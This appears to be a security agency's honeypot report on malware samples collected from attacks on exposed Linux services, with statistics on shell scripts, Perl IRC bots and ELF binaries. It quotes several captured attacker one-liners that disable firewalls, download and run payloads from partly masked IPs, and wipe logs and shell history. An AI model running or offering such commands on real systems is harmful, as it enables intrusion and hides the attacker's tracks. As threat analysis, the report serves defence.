In previous articles, we have dealt with the detection of security incidents using honeypots and the kind of information that can be obtained by using them. Here, we are going to focus our attention on samples of malware that have been collected over the last few months.
Cybercriminals do not rest for a second and they are continually looking for vulnerable services advertised on the Internet that they can work with. They often carry out this task in an automated fashion, with the aim of having as many compromised machines at their disposal as possible. They mainly target:
- Public services with weak credentials, such as FTP, SSH, RDP and VNC.
- Public services that appear vulnerable in some way, as is the case with web servers. They aim to enable malware to be distributed among users of a specific website (XSS) or even to infect the web server itself (ShellShock).
With the vast majority of these attacks, the cybercriminal will download some sort of malware onto the machine they have attacked. The malware will be from the machine of the attacker themselves or another external machine that may also have been compromised previously.
Thanks to our honeypots, INCIBE is collecting a large quantity of samples of the different services exposed every day. Thanks to this, they can then be analysed and identified, enabling very valuable information about them to be obtained, such as:
- Where the attackers are from
- Where the malware distributors come from
- Download URLs
- Type of sample
- Control Panels (C&C)
Over the last few months, we have collected a total of 1,626 samples, with a large number of attacks originating from countries such as China, United States, Canada and Holland.
Below, we are going to analyse each type of file we collected, relevant to our investigation:
- ShellScripts: 83% of the samples collected are bash scripts that the attacker downloads onto the compromised machine, either from the attacking machine itself or from another machine:
/etc/init.d/iptables stop; service iptables stop;SuSefirewall2 stop; reSuSefirewall2 stop; wget -c http://61.X.X.X:80/likds;chmod 777 likds;./likds;
/etc/init.d/iptables stop; service iptables stop;SuSefirewall2 stop; reSuSefirewall2 stop; wget -c http://61.X.X.X:80/likds;chmod 777 32ouk;./32ouk;
/etc/init.d/iptables stop; service iptables stop;SuSefirewall2 stop; reSuSefirewall2 stop; wget -c http://61.X.X.X:80/likds;chmod 777 64rth;./64rth;
In this example, the attacker disables the firewall services before downloading and then running the malware.
cd /tmp && rm -rf dbus.sh && wget -q http://93.X.X.X/mw.pl && perl mw.pl && rm -rf mw.pl && rm -rf /var/log/lastlog && rm -rf .bash_history && history -c
cd /tmp/; wget -q http://93.X.X.X/dbus.sh > /dev/null 2>&1; chmod +x dbus.sh> /dev/null 2>&1 ; ./dbus.sh > /dev/null 2>&1; rm -rf dbus.sh.1; rm -rf /var/log/lastlog; history -c
In this example, the attacker downloads the sample and then goes on to delete the logs and clean up the history.
The downloaded samples run as follows:
These samples contain links to other machines where the malware is stored. These links do not usually remain active for long. When similar samples are analysed, it becomes apparent that the same type of malware is downloaded from different machines that distribute it.
The attackers do not check the architecture of the machine they have attacked to find out which malware to download; rather they download the same malware that has been compiled for different architectures and run all of them. This ensures one of them works. An example of this is shown below:
As we have mentioned, at other times the malware is downloaded from the attacking machine itself using SFTP. They are usually non-automated attacks carried out by a human being.
20% of the samples go undetected by antivirus engines at the moment the download occurs. It often takes 24 to 72 hours for the samples to be detected by the antivirus engines, but there are other samples that take even more time to be detected.
- Octec-Stream: They represent 11.44% of downloaded samples and they pertain to Perl scripts catalogued as Trojan.PerlBot. A high percentage relates to the same type of sample but with some modified information such as the control server, the administrators’ names or the channel’s name. Out of a total of 186 samples, 38 are unique. When they are run, the compromised machine connects to an IRC channel from which it receives commands.
IRC Bot channel administrators
- Text-Plain: They represent 11.69% of the samples gathered. Just like what happens with the ShellScript samples, they contain links to samples for different architectures, and they are all then run in the attacked machine.
Sample of commands run by attacker and malware download
- Executable and Linkable Format (ELF): They make up 23.19% of samples downloaded in the compromised machine, either through Wget, cURL, SFTP or SSH, from other compromised servers or through FTP. A total of 377 executable files have been obtained, of which 71 are unique samples. When the analysis was being carried out, a total of 10 samples went undetected by the antivirus engines.
100% of the samples are ELF files which are executable on Linux systems. The situation when dealing with automated attacks is that the same sample is downloaded numerous times onto the same compromised machine, originating either from the same place or from different places. We also find ourselves with different versions of the same malware.
The same type of malware is distributed over a set period of time, after which another type of threat will appear which replaces the previous one.
- Other detected campaigns: In some cases, attackers do not download malware onto the machine but carry out other tasks, the most notable being:
- Click fraud attacks, as dealt with in previous articles
- Checking that a vulnerable computer is available for future attacks
- Changing root users’ passwords